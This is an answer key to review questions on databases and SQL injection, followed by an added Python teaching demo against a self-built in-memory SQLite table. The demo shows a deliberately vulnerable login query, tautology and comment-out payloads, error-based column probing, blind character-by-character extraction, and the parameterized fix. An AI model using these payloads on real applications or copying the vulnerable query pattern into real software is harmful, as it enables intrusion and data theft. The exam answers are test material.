432 Appendix A ■ Answers to Review Questions
- B. Firewalls can block the scanning of systems and the probing or discovery of a database.
- A. Databases can fall victim to source code exploits, depending on their configuration and design.
- A. A hierarchical database is another alternative to the popular relational database structure.
- C. CGI (Common Gateway Interface) is a server-side mechanism: the CGI script is processed on the server before the results are returned to the client.
- C. SQLping is a tool used to audit (Microsoft SQL Server) databases and help identify settings that may be of concern or problematic.
- B. Browsers do not render hidden form fields, but these fields can be read by using the browser's ability to view the page source.
- B. SQL injection attacks are made possible by improper input validation, which allows attacker-supplied SQL to be issued to a database and executed.
- B. SQL injection can be used to attack databases.
- C. The xp_cmdshell extended stored procedure exists in all versions of SQL Server and can be used to open a command shell. It is disabled by default in current versions of the product, but it can still be re-enabled (for example, through sp_configure).
- B, C, D. The SELECT command is used to craft SQL queries, while WHERE and FROM are used to refine those queries so that they return the desired results.
- B. The WHERE clause limits the results of a SQL query.
- D. The DROP TABLE command removes a table, together with all of its data, from a database.
- C. SQL injection targets the database layer directly: the injected text is executed by the database engine as part of a query.
- A. A row is a name for a line in a database table, typically corresponding to one record.
- C. A distributed database is one that has its information spread across many different systems that are networked together and linked by software so that they behave as one database.
- B. A relational database uses relationships between tables to describe data in an understandable format.
- D. Error messages can reveal the success of an attack, the failure of an attack, the structure of a database, as well as configuration and other information.
- A. When error messages are not descriptive or are suppressed, a blind SQL injection attack can be used to infer information from indirect observations, such as whether a query returns any rows or how long it takes to run.
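Several of the answers above (improper input validation enabling SQL injection, the WHERE clause limiting results, error messages revealing database structure, and blind SQL injection when errors are suppressed) are easier to see in working code. The following is an added example written for this appendix, not code from the book or from any product it discusses. It uses Python's built-in sqlite3 module against an in-memory database; the users table, its rows, and the function names are all constructed for the demonstration, and the "application" is reduced to a single login query.

```python
"""Added example (not from the book): SQL injection against a small SQLite
database, showing how string-built queries let input rewrite the WHERE
clause, the parameterized fix, what error messages leak, and blind
boolean-based inference when errors are hidden.  Schema, rows and function
names are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, pw, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, name, pw):
    """Deliberately vulnerable: the input is spliced into the SQL text, so the
    caller can rewrite the WHERE clause (no input validation at all)."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return conn.execute(sql).fetchall()


def login_fixed(conn, name, pw):
    """Hardened: placeholders pass the input as data, never as SQL syntax."""
    sql = "SELECT name, role FROM users WHERE name = ? AND pw = ?"
    return conn.execute(sql, (name, pw)).fetchall()


def probe_column(conn, column):
    """Error-based probe: guess a column name and return the database's own
    error text (None if the guess was valid).  A verbose application that
    echoes such errors reveals the table structure one guess at a time."""
    try:
        login_vulnerable(conn, f"alice' AND {column} IS NOT NULL --", "x")
    except sqlite3.Error as exc:
        return str(exc)
    return None


def oracle(conn, condition):
    """Blind boolean oracle: the application only shows whether the login query
    returned any rows, so each probe leaks exactly one bit."""
    payload = f"alice' AND ({condition}) --"
    return len(login_vulnerable(conn, payload, "ignored")) > 0


def blind_extract_table_name(conn, max_len=16):
    """Recover the first table name from the schema one character at a time,
    using length() and substr() comparisons through the boolean oracle."""
    target = "(SELECT name FROM sqlite_master WHERE type='table' LIMIT 1)"
    length = 0
    for n in range(1, max_len + 1):          # learn the length first
        if oracle(conn, f"length({target}) = {n}"):
            length = n
            break
    name = ""
    for pos in range(1, length + 1):         # then binary-search each character
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr({target}, {pos}, 1)) <= {mid}"):
                hi = mid
            else:
                lo = mid + 1
        name += chr(lo)
    return name


if __name__ == "__main__":
    db = make_db()
    print("tautology in pw field:", login_vulnerable(db, "x", "' OR '1'='1"))
    print("comment out pw check :", login_vulnerable(db, "alice' --", "wrong"))
    print("same input, fixed    :", login_fixed(db, "x", "' OR '1'='1"))
    print("error for 'password' :", probe_column(db, "password"))
    print("error for 'role'     :", probe_column(db, "role"))
    print("blind table name     :", blind_extract_table_name(db))
```

Note the precedence trap in the first payload: `' OR '1'='1` placed in the password field yields `name = 'x' AND pw = '' OR '1'='1'`, where AND binds tighter than OR, so the OR branch alone is true and every row comes back; the same text in the name field would not work, which is why the second payload uses `--` to comment out the rest of the WHERE clause instead. The blind extraction needs about seven oracle queries per character, which is the cost an attacker pays when the only feedback is "rows" versus "no rows".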